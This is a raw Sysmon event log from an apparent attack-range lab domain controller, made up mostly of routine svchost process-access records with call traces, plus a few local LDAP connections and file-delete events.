|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.604{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CC4A28897D32F4420B28E259F95796,SHA256=67E308DD38C7E45F1CFAD10FBFA06729BE6492BB9D8CAA7D0C6F693A87F9B31C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.588{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.479{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53581-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local3268msft-gc 354300x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.479{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53581-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local3268msft-gc 354300x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.474{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53580-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.474{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53580-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.557{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.d